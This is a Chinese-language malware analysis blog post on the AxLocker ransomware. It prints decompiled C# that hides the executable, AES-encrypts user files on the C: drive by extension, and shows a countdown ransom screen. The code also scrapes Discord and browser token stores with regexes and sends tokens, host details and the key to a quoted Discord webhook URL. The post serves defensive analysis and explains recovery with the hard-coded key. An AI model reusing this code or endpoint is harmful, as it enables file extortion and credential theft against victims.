AxLocker新型勒索软件分析

百家 作者:Chamd5安全团队 2022-12-02 19:20:06

        浏览安全客时发现新出现了三款恶意软件,分别是AxLocker, OctoCrypt, Alice,本文分析其中的AxLocker,AXLocker勒索软件以一种相当典型的方式运行,在勒索受害者之前,针对某些带有AES加密的文件扩展名。

初步分析

是.NET程序,并且有GUI界面

使用dnspy加载,进入到主函数

private static void Main()
  {
   Program.hidefile();
   Program.startencryption();
   Program.show();
  }

程序写的很清晰,竟然没有混淆,应该是刚出来还没有完善版本

程序首先隐藏自身

private static void hidefile()
  {
   File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
  }

然后加密文件并展示提示

加密行为分析

加密C盘下的所有文件

public static void startencryption()
  {
   string targetDirectory = "C:\\";
   Program.ProcessDirectory(targetDirectory, 1"");
  }

虽然看上去只加密C盘文件有点离谱,但是看过了我妹的C盘红色其它盘空的我也觉得正常。毕竟这里面有下载、文档等重要的数据文件,很多社交软件聊天记录、软件数据也存储在这里

然后处理文件

public static void ProcessDirectory(string targetDirectory, int action, string password)
  {
   IEnumerable<string> enumerable = from file in Directory.EnumerateFiles(targetDirectory, "*.*")
   where Program.extensionsToEncrypt.Any((string x) => file.EndsWith(x, StringComparison.OrdinalIgnoreCase))
   select file; // 忽略大小写比对文件后缀
   foreach (string fileName in enumerable)
   {
    Program.ProcessFile(fileName, action, password);
   }
   string[] directories = Directory.GetDirectories(targetDirectory);
   foreach (string text in directories)
   {
    try
    {
     bool flag = !text.Contains("All Users\\Microsoft\\") && !text.Contains("$Recycle.Bin") && !text.Contains("C:\\Windows") && !text.Contains("C:\\Program Files") && !text.Contains("Temporary Internet Files") && !text.Contains("AppData\\") && !text.Contains("\\axlockerkey\\") && !text.Contains("C:\\ProgramData\\") && !text.Contains("\\Axlocker-data\\") && !text.Contains("\\AXLOCKER\\");
     if (flag)
     {
      Program.ProcessDirectory(text, action, password);
     }
    }
    catch
    {
    }
   }

首先根据后缀名过滤掉一些文件,后缀名为

"7z","rar","zip","m3u","m4a","mp3","wma","ogg","wav","sqlite","sqlite3","img","nrg","tc","doc","docx","docm","odt","rtf","wpd","wps","csv","key","pdf","pps","ppt","pptm","pptx","ps","psd","vcf","xlr","xls","xlsx","xlsm","ods","odp","indd","dwg","dxf","kml","kmz","gpx","cad","wmf","txt","3fr","ari","arw","bay","bmp","cr2","crw","cxi","dcr","dng","eip","erf","fff","gif","iiq","j6i","k25","kdc","mef","mfw","mos","mrw","nef","nrw","orf","pef","png","raf","raw","rw2","rwl","rwz","sr2","srf","srw","x3f","jpg","jpeg","tga","tiff","tif","ai","3g2","3gp","asf","avi","flv","m4v","mkv","mov","mp4","mpg","rm","swf","vob","wmv"

然后需要判断文件是否非空

public static bool extension(string fileName)
  {
   byte[] bytes = Encoding.ASCII.GetBytes(fileName);
   byte[] second = File.ReadAllBytes(fileName).Take(0).ToArray<byte>();
   bool flag = bytes.SequenceEqual(second);
   bool result;
   if (flag)
   {
    Program.count++;
    Program.encryptedFiles.Add(fileName);
    result = true;
   }
   else
   {
    result = false;
   }
   return flag;}

最后来个加密

public static void EncryptFile(string fileUnencrypted)
  {
   byte[] array = Encoding.UTF8.GetBytes(Program.password);
   array = SHA256.Create().ComputeHash(array);
   byte[] bytesToBeEncrypted = File.ReadAllBytes(fileUnencrypted);
   byte[] array2 = Program.AES_Encrypt(bytesToBeEncrypted, array);
   FileStream fileStream = File.Open(fileUnencrypted, FileMode.Open);
   fileStream.SetLength(0L);
   fileStream.Close();
   using (FileStream fileStream2 = new FileStream(fileUnencrypted, FileMode.Append))
   {
    bool canWrite = fileStream2.CanWrite;
    if (canWrite)
    {
     byte[] bytes = Encoding.UTF8.GetBytes("");
     fileStream2.Write(bytes, 0, bytes.Length);
     fileStream2.Write(array2, 0, array2.Length);
     Console.WriteLine("Encrypted: " + fileUnencrypted);
     Program.count++;
     Program.encryptedFiles.Add(fileUnencrypted);
    }
            }
        }

通过FileStream.SetLength清空文件,然后写入AES加密后的文件内容。AES加密的key是固定的,为WnZr4u7xh60A2W4Rz的sha256值。并且加密过程中还会统计加密的文件列表

至此加密过程就完成了,接下来展示勒索信息和窃取discord凭证

展示勒索信息分析

private static void show()
  {
   bool flag = File.Exists("C:\\\\Windows\\\\AppMon.txt");
   if (flag)
   {
    MessageBox.Show("ERROR, Private key was deleted.");
    Environment.Exit(-2);
   }
   else
   {
    Application.EnableVisualStyles();
    Application.SetCompatibleTextRenderingDefault(false);
    Application.Run(new AXLOCKER());
   }
  }

首先是判断AppMon.txt是否存在,如果不存在则展示勒索信息。应该是关机之后再次开机,就会展示私钥丢失

然后展示一个计时器,用于心理威胁

private void Timer1_Tick(object sender, EventArgs e)
  {
   bool flag = this.delay >= 0;
   if (flag)
   {
    TimeSpan timeSpan = TimeSpan.FromSeconds((double)(--this.delay));
    this.lblTime.Text = timeSpan.ToString("dd\\:hh\\:mm\\:ss");
   }
   else
   {
    File.Delete("C:\\\\Windows\\\\winlog.txt");
   }
  }

然后创建了一个AppMon.txt

base.MinimizeBox = false;
   base.MaximizeBox = false;
   StreamWriter streamWriter = new StreamWriter("C:\\\\Windows\\\\AppMon.txt");
   streamWriter.Write("ERROR, Private key was deleted.");
   streamWriter.Close();

窃取信息分析

程序会利用一个Grabber类进行信息的窃取

public static List<stringGrab()
  {
   Grabber.Scan();
   List<string> list = new List<string>();
   foreach (string text in Grabber.target)
   {
    bool flag = Directory.Exists(text);
    if (flag)
    {
     string path = text + "\\Local Storage\\leveldb";
     DirectoryInfo directoryInfo = new DirectoryInfo(path);
     foreach (FileInfo fileInfo in directoryInfo.GetFiles("*.ldb"))
     {
      string input = fileInfo.OpenText().ReadToEnd();
      foreach (object obj in Regex.Matches(input, "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"))
      {
       Match match = (Match)obj;
       list.Add(match.Value);
      }
      foreach (object obj2 in Regex.Matches(input, "mfa\\.[\\w-]{84}"))
      {
       Match match2 = (Match)obj2;
       list.Add(match2.Value);
      }
     }
    }
   }
   return list;
  }

并且会利用正则表达式窃取有关信息

窃取的信息列表如下

private static void Scan()
  {
   string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
   string folderPath2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
   Grabber.target.Add(folderPath + "\\Discord");
   Grabber.target.Add(folderPath + "\\discordcanary");
   Grabber.target.Add(folderPath + "\\discordptb");
   Grabber.target.Add(folderPath + "\\\\Opera Software\\Opera Stable");
   Grabber.target.Add(folderPath2 + "\\Google\\Chrome\\User Data\\Default");
   Grabber.target.Add(folderPath2 + "\\BraveSoftware\\Brave-Browser\\User Data\\Default");
   Grabber.target.Add(folderPath2 + "\\Yandex\\YandexBrowser\\User Data\\Default");
  }

包括Discord,Opera,Chrome,Yandex,Brave等软件的数据会被窃取。但是只窃取了ldb文件内容

然后会通过webhook发送

Webhook webhook2 = new Webhook(AXLOCKER.WEBHOOK);
    webhook2.Send(string.Concat(new string[]
    {
     "**Program executed** ```Status: Active \nPC Name: ",
     details2[0],
     "\nUser: ",
     details2[1],
     "\nUUID: ",
     identifier2,
     "\nIP Address: ",
     ip2,
     "```"
    }));
    webhook2.Send(string.Concat(new string[]
    {
     "```Decryption Key: ",
     text9,
     "\nUser ID: ",
     text7,
     "```"
    }));
    webhook2.Send("```Tokens:\n" + text10 + "```");

目标地址为https[:]//discord.com/api/webhooks/1039930467614478378/N2J80EuPMXSWuIBpizgDJ-75CB6gzTyFE72NQ0DJimbA7xriJVmtb14gUP3VCBBZ0A

同时发送的还有其它用户信息

List<string> details = User.GetDetails();
    string identifier = User.GetIdentifier();
    string ip = User.GetIP();

最后确实保存了一个私钥,但是似乎没用

using (MD5CryptoServiceProvider md5CryptoServiceProvider2 = new MD5CryptoServiceProvider())
    {
     byte[] key2 = md5CryptoServiceProvider2.ComputeHash(Encoding.UTF8.GetBytes(this.hash));
     using (TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider2 = new TripleDESCryptoServiceProvider
     {
      Key = key2,
      Mode = CipherMode.ECB,
      Padding = PaddingMode.PKCS7
     })
     {
      ICryptoTransform cryptoTransform2 = tripleDESCryptoServiceProvider2.CreateEncryptor();
      byte[] array6 = cryptoTransform2.TransformFinalBlock(bytes2, 0, bytes2.Length);
      string value2 = Convert.ToBase64String(array6, 0, array6.Length);
      StreamWriter streamWriter3 = new StreamWriter("C:\\\\Windows\\\\winlog.txt");
      streamWriter3.Write(value2);
      streamWriter3.Close();
      this.timer1.Start();
      base.Show();
      webhook2.Send(string.Format("```Files encrypted, file count: {0}```", Program.count));}}
    

总结

这个勒索病毒似乎还处于初级阶段,很多内容不够成熟,例如窃取的信息、加密方式、加密密钥保存,后续可能会有变种。

如果感染,使用程序内包含的密钥AES解密就可以

参考

https://www.anquanke.com/post/id/283511

https://learn.microsoft.com/zh-cn/office/troubleshoot/access/ldb-file-description

https://blog.csdn.net/wang379275614/article/details/7815728

https://zhuanlan.zhihu.com/p/133449879



end


招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析 长期招新

欢迎联系admin@chamd5.org




关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接